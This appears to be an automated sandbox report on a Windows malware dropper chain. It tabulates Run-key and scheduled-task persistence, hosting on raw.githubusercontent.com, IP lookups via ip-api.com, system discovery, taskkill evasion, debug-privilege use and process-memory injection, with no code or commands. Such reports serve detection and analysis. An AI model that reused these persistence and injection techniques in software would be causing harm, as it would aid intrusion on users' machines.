Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9bd1404279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\9bd1404279.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b886460ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\4b886460ab.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8809d7d07b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8809d7d07b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856873749173507" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1752 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4972 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
